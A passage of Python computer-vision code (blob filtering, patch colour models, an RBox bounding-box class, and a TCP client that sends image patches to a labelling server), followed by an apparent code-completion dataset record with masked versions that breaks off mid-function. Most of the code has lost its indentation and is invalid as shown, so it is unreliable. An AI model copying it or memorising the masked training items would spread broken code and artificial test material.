if weights[i] > weight:
fimage += np.uint8((image == i) + 0)
retained_lables.append(i)
fimage -= np.uint8(image == max)
fimage = np.uint8(fimage * 255)
boxes = []
if (len(retained_lables) > 0):
retained_lables.remove(max)
boxes = find_margined_bounding_boxes(image.copy(), retained_lables, margins)
return fimage, boxes
def calculatePossiblePadding(box, shape, default = 20):
w_pad = default
h_pad = default
# dynamic padding
if default == 0:
rbox = RBox.fromPointBoundingBox(box)
w_pad = round(0.205 * rbox.w)
h_pad = round(0.205 * rbox.h)
# extract with and height from shape
height, width = shape[0:2]
# extract starting, ending x and y from box
((x_start, y_start), (x_end, y_end)) = box
# check if is it possible to add certain padding
# if not add possible padding for all 4 points
pad_x_start = h_pad
if y_start - pad_x_start < 0:
pad_x_start = y_start
pad_y_start = w_pad
if x_start - pad_y_start < 0:
pad_y_start = x_start
pad_x_end = w_pad
if y_end + pad_x_end >= height:
pad_x_end = height - y_end - 1
pad_y_end = h_pad
if x_end + pad_y_end >= width:
pad_y_end = width - x_end - 1
# return resultant padding
return pad_x_start, pad_x_end, pad_y_start, pad_y_end
def findConnectedComponents(frame, threshold = 150, blur_radius = 1.0):
img = frame.copy() # gray-scale image
# smooth the image (to remove small objects)
imgf = ndimage.gaussian_filter(img, blur_radius)
# find connected components
labeled, nr_objects = ndimage.label(imgf > threshold)
return labeled, nr_objects
def drawBoundingBox(im, start, end, color):
cv2.rectangle(im, start, end, color, 1)
def pwpBasedTracking(image, frame_models, threshold):
    """Apply per-patch color models to *image* and merge the results.

    Each entry of *frame_models* is (model, box, reference_pixel_count).
    The model is applied to its patch, the response is cleaned with
    alternating open/close passes, and the patch is accepted only if
    enough foreground pixels survive relative to the reference count.
    Returns a uint8 foreground mask covering the whole image.
    """
    kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (7, 7))
    predicted = np.zeros((image.shape[0:2]), np.uint8)
    # FOREACH GIVEN PATCH AND ITS MODEL, APPLY MODEL TO PATCH
    for fm in frame_models:
        patch = extractPatch(image, fm[1])
        mask = np.zeros(patch.shape[0:2], np.uint8)
        res = applyModel(patch, mask, fm[0])
        # two open/close rounds: remove speckle, then fill small holes
        res = cv2.morphologyEx(res, cv2.MORPH_OPEN, kernel)
        res = cv2.morphologyEx(res, cv2.MORPH_CLOSE, kernel)
        res = cv2.morphologyEx(res, cv2.MORPH_OPEN, kernel)
        res = cv2.morphologyEx(res, cv2.MORPH_CLOSE, kernel)
        # accept the patch only if its surviving foreground exceeds a
        # fraction of the reference pixel count fm[2] (at least 10 px)
        if(len(np.nonzero(res)[0]) > max(fm[2] * threshold, 10) ):
            predicted[fm[1][0]: fm[1][1], fm[1][2]: fm[1][3]] += res;
    return predicted
def extractPatch(im, box):
# extract coordinates
x1, x2, y1, y2 = box
# extract and return patch
return im[x1: x2, y1: y2, :]
def randomColor():
return np.random.randint(0, 255, (1, 3))[0].tolist()
def performColorProcessing(image, mask, iterations = 1):
# initialize kernel
kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (3, 3))
for i in range(iterations):
model = computePosteriors(image, np.uint8(mask > 0) + 0)
mask = applyModel(image, mask, model)
cv2.morphologyEx(mask, cv2.MORPH_OPEN, kernel=kernel)
return mask
def killDyingLables(frame, mask, threshold = 0.5):
# get initial weights of lables
initial_weights = np.array([np.sum(frame == lable) for lable in range(np.amax(frame) + 1)]) + 0.00001
# get final labled frame
labled_frame = frame * mask
# get final weights
final_weights = np.array([np.sum(labled_frame == lable) for lable in range(np.amax(frame) + 1)])
# final probabilites
final_probs = (final_weights/initial_weights) < threshold
for lable in range(len(final_probs)):
dying = final_probs[lable]
# check is lable is dying
if dying:
# kill lable
labled_frame -= np.uint8((labled_frame == lable) * lable)
# return final labled frame
return labled_frame
def killSmallLables(frame, threshold = 150):
# get initial weights of lables
initial_weights = np.array([np.sum(frame == lable) for lable in range(np.amax(frame) + 1)])
# final probabilites
final_probs = initial_weights < threshold
for lable in range(len(final_probs)):
dying = final_probs[lable]
# check is lable is dying
if dying:
# kill lable
frame -= np.uint8(np.uint8(frame == lable) * lable)
# return final labled frame
return frame
class RBox:
def __init__(self):
# initialize atributes
self.x = 0
self.y = 0
self.w = 0
self.h = 0
@staticmethod
def fromClassicalBoundingBox(box):
# initialize rbox
rbox = RBox()
# copy attributes
rbox.x = box[0]
rbox.y = box[1]
rbox.w = box[2]
rbox.h = box[3]
# return rbox
return rbox
@staticmethod
def fromClassicalBoundingBoxes(boxes):
return [RBox.fromClassicalBoundingBox(box) for box in boxes]
@staticmethod
def fromRoughBoundingBox(box):
# initialize rbox
rbox = RBox()
# copy attributes
rbox.x = box[0]
rbox.y = box[2]
rbox.h = box[1] - box[0]
rbox.w = box[3] - box[2]
# return rbox
return rbox
@staticmethod
def fromPointBoundingBox(box):
# initialize rbox
rbox = RBox()
# copy attributes
rbox.x = box[0][0]
rbox.y = box[0][1]
rbox.w = box[1][0] - box[0][0]
rbox.h = box[1][1] - box[0][1]
# return rbox
return rbox
@staticmethod
def fromPointBoundingBoxes(boxes):
return [RBox.fromPointBoundingBox(box) for box in boxes]
def classicalBoundingBox(self):
# return array like bounding box
return [self.x, self.y, self.w, self.h]
def pointBoundingBox(self):
# return tuple of end points
return ((self.x, self.y), (self.x + self.w, self.y + self.h))
def area(self):
return self.h * self.w
def __or__(self, other_box):
# initialize resultant box
rbox = RBox()
# calculate values
rbox.x = min(self.x, other_box.x)
rbox.y = min(self.y, other_box.y)
rbox.w = max(self.x + self.w, other_box.x + other_box.w) - rbox.x
rbox.h = max(self.y + self.h, other_box.y + other_box.h) - rbox.y
return rbox
def __and__(self, other_box):
# initialize resultant box
rbox = RBox()
# calculate values
rbox.x = max(self.x, other_box.x)
rbox.y = max(self.y, other_box.y)
rbox.w = min(self.x + self.w, other_box.x + other_box.w) - rbox.x
rbox.h = min(self.y + self.h, other_box.y + other_box.h) - rbox.y
if rbox.w < 0 or rbox.h < 0:
# reinitailize or make it zero
rbox = RBox()
return rbox
def similarity(self, other_box):
# (A & B)/(A | B) = (A & B).area/(A.area + B.area - (A & B).area)
#return (self & other_box).area()/(self.area() + other_box.area() - (self & other_box).area())
min_area = min(self.area(), other_box.area())
return (self & other_box).area()/min_area
def __str__(self):
return "{} {} {} {}".format(self.x, self.y, self.w, self.h)
def __mul__(self, other_box):
# calculate similarity and return
return self.similarity(other_box)
def __eq__(self, other):
return self.x == other.x and self.y == other.y and self.w == other.w and self.h == other.h
@staticmethod
def similarityStats(boxes):
# create matrix out of boxes
sim_mat = np.array(boxes).reshape((-1, 1))
sim_mat = np.tril(sim_mat.dot(sim_mat.T), -1)
# return similarity matrix
return sim_mat
@staticmethod
def similarityThreshold(boxes, threshold = 0.8):
# get similarity matrix
sim_mat = RBox.similarityStats(boxes)
# find thresholded indexes
ind = np.array(np.nonzero(sim_mat > threshold))
# return in the form of list
return list(ind.T)
@staticmethod
def reduceBoxes(boxes, threshold=0.8):
similar_boxes = RBox.similarityThreshold(boxes, threshold)
while len(similar_boxes) > 0:
union = boxes[similar_boxes[0][1]] | boxes[similar_boxes[0][0]]
# remove similar boxes
del boxes[similar_boxes[0][0]]
del boxes[similar_boxes[0][1]]
boxes.append(union)
similar_boxes = RBox.similarityThreshold(boxes, threshold)
return boxes
@staticmethod
def toPointBoundingBoxes(boxes):
return [box.pointBoundingBox() for box in boxes]
@staticmethod
def toClassicBoundingBoxes(boxes):
return [box.classicalBoundingBox() for box in boxes]
def extractPatchFromImage(self, image, square=False):
# get bounding box end points
(start, end) = self.pointBoundingBox()
start, end = list(start), list(end)
# check if square flag is on
if square:
im_h, im_w = image.shape[0:2]
# adjust start and end so that height and width are equal
if self.h != self.w:
# find bigger size
if self.h > self.w:
# find difference
diff = self.h - self.w
if start[0] >= int(diff/2):
start[0] -= math.floor(diff/2)
diff -= math.floor(diff/2)
else:
diff -= start[0]
start[0] = 0
end[0] += diff
if end[0] >= im_w:
diff = end[0] - im_w + 1
end[1] -= diff
else:
# find difference
diff = self.w - self.h
if start[1] >= int(diff / 2):
start[1] -= math.floor(diff / 2)
diff -= math.floor(diff / 2)
else:
diff -= start[1]
start[1] = 0
end[1] += diff
if end[1] >= im_h:
diff = end[1] - im_h + 1
end[0] -= diff
# return patch
return image[start[1]: end[1], start[0]: end[0]]
def addPatchtoImage(self, image, patch):
# get bounding box end points
(start, end) = self.pointBoundingBox()
# patch in to image
image[start[1]: end[1], start[0]: end[0]] = patch
# return image
return image
def askForLable(patch):
# write an image to send
cv2.imwrite("patch.jpg", patch)
# setup client socket
clientSock = socket(AF_INET, SOCK_STREAM)
clientSock.connect((TCP_IP, TCP_PORT))
# open image
image = open("patch.jpg", 'rb')
# read bytes equal to buffer size
data = image.read(BUFFER_SIZE)
# while image still has data
while (data):
# send data to server
clientSock.send(data)
# read more data if available
data = image.read(BUFFER_SIZE)
# close file
image.close()
# signal server to end data stream
clientSock.shutdown(SHUT_WR)
# recieved lable as binary data from server and convert it to string
label = clientSock.recv(1024)
label = label.decode("utf-8")
return label
|
flexible
|
{
"blob_id": "f3895f38be29fb07903237d8846cc9d657b39ea9",
"index": 6495,
"step-1": "<mask token>\n\n\nclass RBox:\n\n def __init__(self):\n self.x = 0\n self.y = 0\n self.w = 0\n self.h = 0\n\n @staticmethod\n def fromClassicalBoundingBox(box):\n rbox = RBox()\n rbox.x = box[0]\n rbox.y = box[1]\n rbox.w = box[2]\n rbox.h = box[3]\n return rbox\n\n @staticmethod\n def fromClassicalBoundingBoxes(boxes):\n return [RBox.fromClassicalBoundingBox(box) for box in boxes]\n\n @staticmethod\n def fromRoughBoundingBox(box):\n rbox = RBox()\n rbox.x = box[0]\n rbox.y = box[2]\n rbox.h = box[1] - box[0]\n rbox.w = box[3] - box[2]\n return rbox\n\n @staticmethod\n def fromPointBoundingBox(box):\n rbox = RBox()\n rbox.x = box[0][0]\n rbox.y = box[0][1]\n rbox.w = box[1][0] - box[0][0]\n rbox.h = box[1][1] - box[0][1]\n return rbox\n\n @staticmethod\n def fromPointBoundingBoxes(boxes):\n return [RBox.fromPointBoundingBox(box) for box in boxes]\n\n def classicalBoundingBox(self):\n return [self.x, self.y, self.w, self.h]\n\n def pointBoundingBox(self):\n return (self.x, self.y), (self.x + self.w, self.y + self.h)\n\n def area(self):\n return self.h * self.w\n\n def __or__(self, other_box):\n rbox = RBox()\n rbox.x = min(self.x, other_box.x)\n rbox.y = min(self.y, other_box.y)\n rbox.w = max(self.x + self.w, other_box.x + other_box.w) - rbox.x\n rbox.h = max(self.y + self.h, other_box.y + other_box.h) - rbox.y\n return rbox\n\n def __and__(self, other_box):\n rbox = RBox()\n rbox.x = max(self.x, other_box.x)\n rbox.y = max(self.y, other_box.y)\n rbox.w = min(self.x + self.w, other_box.x + other_box.w) - rbox.x\n rbox.h = min(self.y + self.h, other_box.y + other_box.h) - rbox.y\n if rbox.w < 0 or rbox.h < 0:\n rbox = RBox()\n return rbox\n\n def similarity(self, other_box):\n min_area = min(self.area(), other_box.area())\n return (self & other_box).area() / min_area\n\n def __str__(self):\n return '{} {} {} {}'.format(self.x, self.y, self.w, self.h)\n\n def __mul__(self, other_box):\n return self.similarity(other_box)\n\n def __eq__(self, other):\n 
return (self.x == other.x and self.y == other.y and self.w == other\n .w and self.h == other.h)\n\n @staticmethod\n def similarityStats(boxes):\n sim_mat = np.array(boxes).reshape((-1, 1))\n sim_mat = np.tril(sim_mat.dot(sim_mat.T), -1)\n return sim_mat\n\n @staticmethod\n def similarityThreshold(boxes, threshold=0.8):\n sim_mat = RBox.similarityStats(boxes)\n ind = np.array(np.nonzero(sim_mat > threshold))\n return list(ind.T)\n\n @staticmethod\n def reduceBoxes(boxes, threshold=0.8):\n similar_boxes = RBox.similarityThreshold(boxes, threshold)\n while len(similar_boxes) > 0:\n union = boxes[similar_boxes[0][1]] | boxes[similar_boxes[0][0]]\n del boxes[similar_boxes[0][0]]\n del boxes[similar_boxes[0][1]]\n boxes.append(union)\n similar_boxes = RBox.similarityThreshold(boxes, threshold)\n return boxes\n\n @staticmethod\n def toPointBoundingBoxes(boxes):\n return [box.pointBoundingBox() for box in boxes]\n\n @staticmethod\n def toClassicBoundingBoxes(boxes):\n return [box.classicalBoundingBox() for box in boxes]\n\n def extractPatchFromImage(self, image, square=False):\n start, end = self.pointBoundingBox()\n start, end = list(start), list(end)\n if square:\n im_h, im_w = image.shape[0:2]\n if self.h != self.w:\n if self.h > self.w:\n diff = self.h - self.w\n if start[0] >= int(diff / 2):\n start[0] -= math.floor(diff / 2)\n diff -= math.floor(diff / 2)\n else:\n diff -= start[0]\n start[0] = 0\n end[0] += diff\n if end[0] >= im_w:\n diff = end[0] - im_w + 1\n end[1] -= diff\n else:\n diff = self.w - self.h\n if start[1] >= int(diff / 2):\n start[1] -= math.floor(diff / 2)\n diff -= math.floor(diff / 2)\n else:\n diff -= start[1]\n start[1] = 0\n end[1] += diff\n if end[1] >= im_h:\n diff = end[1] - im_h + 1\n end[0] -= diff\n return image[start[1]:end[1], start[0]:end[0]]\n\n def addPatchtoImage(self, image, patch):\n start, end = self.pointBoundingBox()\n image[start[1]:end[1], start[0]:end[0]] = patch\n return image\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef find_bounding_box(binary_matrix, margins=(0, 0)):\n indicies = np.array(np.nonzero(binary_matrix + 0))\n ys = margins[1] + np.amin(indicies[0])\n ye = margins[1] + np.amax(indicies[0])\n xs = margins[0] + np.amin(indicies[1])\n xe = margins[0] + np.amax(indicies[1])\n return [(xs, ys), (xe, ye)]\n\n\n<mask token>\n\n\ndef findConnectedComponents(frame, threshold=150, blur_radius=1.0):\n img = frame.copy()\n imgf = ndimage.gaussian_filter(img, blur_radius)\n labeled, nr_objects = ndimage.label(imgf > threshold)\n return labeled, nr_objects\n\n\n<mask token>\n\n\ndef performColorProcessing(image, mask, iterations=1):\n kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (3, 3))\n for i in range(iterations):\n model = computePosteriors(image, np.uint8(mask > 0) + 0)\n mask = applyModel(image, mask, model)\n cv2.morphologyEx(mask, cv2.MORPH_OPEN, kernel=kernel)\n return mask\n\n\n<mask token>\n\n\nclass RBox:\n\n def __init__(self):\n self.x = 0\n self.y = 0\n self.w = 0\n self.h = 0\n\n @staticmethod\n def fromClassicalBoundingBox(box):\n rbox = RBox()\n rbox.x = box[0]\n rbox.y = box[1]\n rbox.w = box[2]\n rbox.h = box[3]\n return rbox\n\n @staticmethod\n def fromClassicalBoundingBoxes(boxes):\n return [RBox.fromClassicalBoundingBox(box) for box in boxes]\n\n @staticmethod\n def fromRoughBoundingBox(box):\n rbox = RBox()\n rbox.x = box[0]\n rbox.y = box[2]\n rbox.h = box[1] - box[0]\n rbox.w = box[3] - box[2]\n return rbox\n\n @staticmethod\n def fromPointBoundingBox(box):\n rbox = RBox()\n rbox.x = box[0][0]\n rbox.y = box[0][1]\n rbox.w = box[1][0] - box[0][0]\n rbox.h = box[1][1] - box[0][1]\n return rbox\n\n @staticmethod\n def fromPointBoundingBoxes(boxes):\n return [RBox.fromPointBoundingBox(box) for box in boxes]\n\n def classicalBoundingBox(self):\n return [self.x, self.y, self.w, self.h]\n\n def pointBoundingBox(self):\n return (self.x, self.y), (self.x + self.w, self.y + self.h)\n\n def area(self):\n return self.h * 
self.w\n\n def __or__(self, other_box):\n rbox = RBox()\n rbox.x = min(self.x, other_box.x)\n rbox.y = min(self.y, other_box.y)\n rbox.w = max(self.x + self.w, other_box.x + other_box.w) - rbox.x\n rbox.h = max(self.y + self.h, other_box.y + other_box.h) - rbox.y\n return rbox\n\n def __and__(self, other_box):\n rbox = RBox()\n rbox.x = max(self.x, other_box.x)\n rbox.y = max(self.y, other_box.y)\n rbox.w = min(self.x + self.w, other_box.x + other_box.w) - rbox.x\n rbox.h = min(self.y + self.h, other_box.y + other_box.h) - rbox.y\n if rbox.w < 0 or rbox.h < 0:\n rbox = RBox()\n return rbox\n\n def similarity(self, other_box):\n min_area = min(self.area(), other_box.area())\n return (self & other_box).area() / min_area\n\n def __str__(self):\n return '{} {} {} {}'.format(self.x, self.y, self.w, self.h)\n\n def __mul__(self, other_box):\n return self.similarity(other_box)\n\n def __eq__(self, other):\n return (self.x == other.x and self.y == other.y and self.w == other\n .w and self.h == other.h)\n\n @staticmethod\n def similarityStats(boxes):\n sim_mat = np.array(boxes).reshape((-1, 1))\n sim_mat = np.tril(sim_mat.dot(sim_mat.T), -1)\n return sim_mat\n\n @staticmethod\n def similarityThreshold(boxes, threshold=0.8):\n sim_mat = RBox.similarityStats(boxes)\n ind = np.array(np.nonzero(sim_mat > threshold))\n return list(ind.T)\n\n @staticmethod\n def reduceBoxes(boxes, threshold=0.8):\n similar_boxes = RBox.similarityThreshold(boxes, threshold)\n while len(similar_boxes) > 0:\n union = boxes[similar_boxes[0][1]] | boxes[similar_boxes[0][0]]\n del boxes[similar_boxes[0][0]]\n del boxes[similar_boxes[0][1]]\n boxes.append(union)\n similar_boxes = RBox.similarityThreshold(boxes, threshold)\n return boxes\n\n @staticmethod\n def toPointBoundingBoxes(boxes):\n return [box.pointBoundingBox() for box in boxes]\n\n @staticmethod\n def toClassicBoundingBoxes(boxes):\n return [box.classicalBoundingBox() for box in boxes]\n\n def extractPatchFromImage(self, image, 
square=False):\n start, end = self.pointBoundingBox()\n start, end = list(start), list(end)\n if square:\n im_h, im_w = image.shape[0:2]\n if self.h != self.w:\n if self.h > self.w:\n diff = self.h - self.w\n if start[0] >= int(diff / 2):\n start[0] -= math.floor(diff / 2)\n diff -= math.floor(diff / 2)\n else:\n diff -= start[0]\n start[0] = 0\n end[0] += diff\n if end[0] >= im_w:\n diff = end[0] - im_w + 1\n end[1] -= diff\n else:\n diff = self.w - self.h\n if start[1] >= int(diff / 2):\n start[1] -= math.floor(diff / 2)\n diff -= math.floor(diff / 2)\n else:\n diff -= start[1]\n start[1] = 0\n end[1] += diff\n if end[1] >= im_h:\n diff = end[1] - im_h + 1\n end[0] -= diff\n return image[start[1]:end[1], start[0]:end[0]]\n\n def addPatchtoImage(self, image, patch):\n start, end = self.pointBoundingBox()\n image[start[1]:end[1], start[0]:end[0]] = patch\n return image\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef find_margined_bounding_boxes(fimage, lables, margins):\n boxes = []\n for lable in lables:\n labled = (fimage == lable) + 0\n box = find_bounding_box(labled, margins)\n boxes.append(box)\n return boxes\n\n\ndef find_bounding_box(binary_matrix, margins=(0, 0)):\n indicies = np.array(np.nonzero(binary_matrix + 0))\n ys = margins[1] + np.amin(indicies[0])\n ye = margins[1] + np.amax(indicies[0])\n xs = margins[0] + np.amin(indicies[1])\n xe = margins[0] + np.amax(indicies[1])\n return [(xs, ys), (xe, ye)]\n\n\n<mask token>\n\n\ndef findConnectedComponents(frame, threshold=150, blur_radius=1.0):\n img = frame.copy()\n imgf = ndimage.gaussian_filter(img, blur_radius)\n labeled, nr_objects = ndimage.label(imgf > threshold)\n return labeled, nr_objects\n\n\n<mask token>\n\n\ndef performColorProcessing(image, mask, iterations=1):\n kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (3, 3))\n for i in range(iterations):\n model = computePosteriors(image, np.uint8(mask > 0) + 0)\n mask = applyModel(image, mask, model)\n cv2.morphologyEx(mask, cv2.MORPH_OPEN, kernel=kernel)\n return mask\n\n\n<mask token>\n\n\ndef killSmallLables(frame, threshold=150):\n initial_weights = np.array([np.sum(frame == lable) for lable in range(\n np.amax(frame) + 1)])\n final_probs = initial_weights < threshold\n for lable in range(len(final_probs)):\n dying = final_probs[lable]\n if dying:\n frame -= np.uint8(np.uint8(frame == lable) * lable)\n return frame\n\n\nclass RBox:\n\n def __init__(self):\n self.x = 0\n self.y = 0\n self.w = 0\n self.h = 0\n\n @staticmethod\n def fromClassicalBoundingBox(box):\n rbox = RBox()\n rbox.x = box[0]\n rbox.y = box[1]\n rbox.w = box[2]\n rbox.h = box[3]\n return rbox\n\n @staticmethod\n def fromClassicalBoundingBoxes(boxes):\n return [RBox.fromClassicalBoundingBox(box) for box in boxes]\n\n @staticmethod\n def fromRoughBoundingBox(box):\n rbox = RBox()\n rbox.x = box[0]\n rbox.y = box[2]\n rbox.h = box[1] - box[0]\n rbox.w = 
box[3] - box[2]\n return rbox\n\n @staticmethod\n def fromPointBoundingBox(box):\n rbox = RBox()\n rbox.x = box[0][0]\n rbox.y = box[0][1]\n rbox.w = box[1][0] - box[0][0]\n rbox.h = box[1][1] - box[0][1]\n return rbox\n\n @staticmethod\n def fromPointBoundingBoxes(boxes):\n return [RBox.fromPointBoundingBox(box) for box in boxes]\n\n def classicalBoundingBox(self):\n return [self.x, self.y, self.w, self.h]\n\n def pointBoundingBox(self):\n return (self.x, self.y), (self.x + self.w, self.y + self.h)\n\n def area(self):\n return self.h * self.w\n\n def __or__(self, other_box):\n rbox = RBox()\n rbox.x = min(self.x, other_box.x)\n rbox.y = min(self.y, other_box.y)\n rbox.w = max(self.x + self.w, other_box.x + other_box.w) - rbox.x\n rbox.h = max(self.y + self.h, other_box.y + other_box.h) - rbox.y\n return rbox\n\n def __and__(self, other_box):\n rbox = RBox()\n rbox.x = max(self.x, other_box.x)\n rbox.y = max(self.y, other_box.y)\n rbox.w = min(self.x + self.w, other_box.x + other_box.w) - rbox.x\n rbox.h = min(self.y + self.h, other_box.y + other_box.h) - rbox.y\n if rbox.w < 0 or rbox.h < 0:\n rbox = RBox()\n return rbox\n\n def similarity(self, other_box):\n min_area = min(self.area(), other_box.area())\n return (self & other_box).area() / min_area\n\n def __str__(self):\n return '{} {} {} {}'.format(self.x, self.y, self.w, self.h)\n\n def __mul__(self, other_box):\n return self.similarity(other_box)\n\n def __eq__(self, other):\n return (self.x == other.x and self.y == other.y and self.w == other\n .w and self.h == other.h)\n\n @staticmethod\n def similarityStats(boxes):\n sim_mat = np.array(boxes).reshape((-1, 1))\n sim_mat = np.tril(sim_mat.dot(sim_mat.T), -1)\n return sim_mat\n\n @staticmethod\n def similarityThreshold(boxes, threshold=0.8):\n sim_mat = RBox.similarityStats(boxes)\n ind = np.array(np.nonzero(sim_mat > threshold))\n return list(ind.T)\n\n @staticmethod\n def reduceBoxes(boxes, threshold=0.8):\n similar_boxes = RBox.similarityThreshold(boxes, 
threshold)\n while len(similar_boxes) > 0:\n union = boxes[similar_boxes[0][1]] | boxes[similar_boxes[0][0]]\n del boxes[similar_boxes[0][0]]\n del boxes[similar_boxes[0][1]]\n boxes.append(union)\n similar_boxes = RBox.similarityThreshold(boxes, threshold)\n return boxes\n\n @staticmethod\n def toPointBoundingBoxes(boxes):\n return [box.pointBoundingBox() for box in boxes]\n\n @staticmethod\n def toClassicBoundingBoxes(boxes):\n return [box.classicalBoundingBox() for box in boxes]\n\n def extractPatchFromImage(self, image, square=False):\n start, end = self.pointBoundingBox()\n start, end = list(start), list(end)\n if square:\n im_h, im_w = image.shape[0:2]\n if self.h != self.w:\n if self.h > self.w:\n diff = self.h - self.w\n if start[0] >= int(diff / 2):\n start[0] -= math.floor(diff / 2)\n diff -= math.floor(diff / 2)\n else:\n diff -= start[0]\n start[0] = 0\n end[0] += diff\n if end[0] >= im_w:\n diff = end[0] - im_w + 1\n end[1] -= diff\n else:\n diff = self.w - self.h\n if start[1] >= int(diff / 2):\n start[1] -= math.floor(diff / 2)\n diff -= math.floor(diff / 2)\n else:\n diff -= start[1]\n start[1] = 0\n end[1] += diff\n if end[1] >= im_h:\n diff = end[1] - im_h + 1\n end[0] -= diff\n return image[start[1]:end[1], start[0]:end[0]]\n\n def addPatchtoImage(self, image, patch):\n start, end = self.pointBoundingBox()\n image[start[1]:end[1], start[0]:end[0]] = patch\n return image\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\ndef find_bounding_boxes(fimage, lables):\n boxes = []\n for lable in lables:\n labled = (fimage == lable) + 0\n box = find_bounding_box(labled)\n boxes.append(box)\n return boxes\n\n\ndef find_margined_bounding_boxes(fimage, lables, margins):\n boxes = []\n for lable in lables:\n labled = (fimage == lable) + 0\n box = find_bounding_box(labled, margins)\n boxes.append(box)\n return boxes\n\n\ndef find_bounding_box(binary_matrix, margins=(0, 0)):\n indicies = np.array(np.nonzero(binary_matrix + 0))\n ys = margins[1] + np.amin(indicies[0])\n ye = margins[1] + np.amax(indicies[0])\n xs = margins[0] + np.amin(indicies[1])\n xe = margins[0] + np.amax(indicies[1])\n return [(xs, ys), (xe, ye)]\n\n\n<mask token>\n\n\ndef weightFilterMini(image, weight):\n image = np.uint8(image)\n image, contours, hierarchy = cv2.findContours(image, cv2.RETR_TREE, cv2\n .CHAIN_APPROX_SIMPLE)\n final_contours = []\n for cnt in contours:\n if cv2.contourArea(cnt) >= weight:\n final_contours.append(cnt)\n fimage = np.zeros(image.shape[:2], np.uint8)\n cv2.drawContours(fimage, final_contours, -1, 255, -1)\n boxes = RBox.toPointBoundingBoxes(RBox.fromClassicalBoundingBoxes([cv2.\n boundingRect(cnt) for cnt in final_contours]))\n return fimage, boxes\n\n\ndef weightFilterMargined(image, lables, weight, margins):\n max = 0\n weights = np.zeros(lables)\n fimage = np.zeros_like(image)\n retained_lables = []\n for i in range(lables):\n weights[i] = np.sum(np.sum(image == i))\n if weights[i] > weights[max]:\n max = i\n if weights[i] > weight:\n fimage += np.uint8((image == i) + 0)\n retained_lables.append(i)\n fimage -= np.uint8(image == max)\n fimage = np.uint8(fimage * 255)\n boxes = []\n if len(retained_lables) > 0:\n retained_lables.remove(max)\n boxes = find_margined_bounding_boxes(image.copy(), retained_lables,\n margins)\n return fimage, boxes\n\n\ndef calculatePossiblePadding(box, shape, default=20):\n w_pad = default\n h_pad = default\n if default == 0:\n rbox = 
RBox.fromPointBoundingBox(box)\n w_pad = round(0.205 * rbox.w)\n h_pad = round(0.205 * rbox.h)\n height, width = shape[0:2]\n (x_start, y_start), (x_end, y_end) = box\n pad_x_start = h_pad\n if y_start - pad_x_start < 0:\n pad_x_start = y_start\n pad_y_start = w_pad\n if x_start - pad_y_start < 0:\n pad_y_start = x_start\n pad_x_end = w_pad\n if y_end + pad_x_end >= height:\n pad_x_end = height - y_end - 1\n pad_y_end = h_pad\n if x_end + pad_y_end >= width:\n pad_y_end = width - x_end - 1\n return pad_x_start, pad_x_end, pad_y_start, pad_y_end\n\n\ndef findConnectedComponents(frame, threshold=150, blur_radius=1.0):\n img = frame.copy()\n imgf = ndimage.gaussian_filter(img, blur_radius)\n labeled, nr_objects = ndimage.label(imgf > threshold)\n return labeled, nr_objects\n\n\ndef drawBoundingBox(im, start, end, color):\n cv2.rectangle(im, start, end, color, 1)\n\n\n<mask token>\n\n\ndef extractPatch(im, box):\n x1, x2, y1, y2 = box\n return im[x1:x2, y1:y2, :]\n\n\ndef randomColor():\n return np.random.randint(0, 255, (1, 3))[0].tolist()\n\n\ndef performColorProcessing(image, mask, iterations=1):\n kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (3, 3))\n for i in range(iterations):\n model = computePosteriors(image, np.uint8(mask > 0) + 0)\n mask = applyModel(image, mask, model)\n cv2.morphologyEx(mask, cv2.MORPH_OPEN, kernel=kernel)\n return mask\n\n\ndef killDyingLables(frame, mask, threshold=0.5):\n initial_weights = np.array([np.sum(frame == lable) for lable in range(\n np.amax(frame) + 1)]) + 1e-05\n labled_frame = frame * mask\n final_weights = np.array([np.sum(labled_frame == lable) for lable in\n range(np.amax(frame) + 1)])\n final_probs = final_weights / initial_weights < threshold\n for lable in range(len(final_probs)):\n dying = final_probs[lable]\n if dying:\n labled_frame -= np.uint8((labled_frame == lable) * lable)\n return labled_frame\n\n\ndef killSmallLables(frame, threshold=150):\n initial_weights = np.array([np.sum(frame == lable) for lable 
in range(\n np.amax(frame) + 1)])\n final_probs = initial_weights < threshold\n for lable in range(len(final_probs)):\n dying = final_probs[lable]\n if dying:\n frame -= np.uint8(np.uint8(frame == lable) * lable)\n return frame\n\n\nclass RBox:\n\n def __init__(self):\n self.x = 0\n self.y = 0\n self.w = 0\n self.h = 0\n\n @staticmethod\n def fromClassicalBoundingBox(box):\n rbox = RBox()\n rbox.x = box[0]\n rbox.y = box[1]\n rbox.w = box[2]\n rbox.h = box[3]\n return rbox\n\n @staticmethod\n def fromClassicalBoundingBoxes(boxes):\n return [RBox.fromClassicalBoundingBox(box) for box in boxes]\n\n @staticmethod\n def fromRoughBoundingBox(box):\n rbox = RBox()\n rbox.x = box[0]\n rbox.y = box[2]\n rbox.h = box[1] - box[0]\n rbox.w = box[3] - box[2]\n return rbox\n\n @staticmethod\n def fromPointBoundingBox(box):\n rbox = RBox()\n rbox.x = box[0][0]\n rbox.y = box[0][1]\n rbox.w = box[1][0] - box[0][0]\n rbox.h = box[1][1] - box[0][1]\n return rbox\n\n @staticmethod\n def fromPointBoundingBoxes(boxes):\n return [RBox.fromPointBoundingBox(box) for box in boxes]\n\n def classicalBoundingBox(self):\n return [self.x, self.y, self.w, self.h]\n\n def pointBoundingBox(self):\n return (self.x, self.y), (self.x + self.w, self.y + self.h)\n\n def area(self):\n return self.h * self.w\n\n def __or__(self, other_box):\n rbox = RBox()\n rbox.x = min(self.x, other_box.x)\n rbox.y = min(self.y, other_box.y)\n rbox.w = max(self.x + self.w, other_box.x + other_box.w) - rbox.x\n rbox.h = max(self.y + self.h, other_box.y + other_box.h) - rbox.y\n return rbox\n\n def __and__(self, other_box):\n rbox = RBox()\n rbox.x = max(self.x, other_box.x)\n rbox.y = max(self.y, other_box.y)\n rbox.w = min(self.x + self.w, other_box.x + other_box.w) - rbox.x\n rbox.h = min(self.y + self.h, other_box.y + other_box.h) - rbox.y\n if rbox.w < 0 or rbox.h < 0:\n rbox = RBox()\n return rbox\n\n def similarity(self, other_box):\n 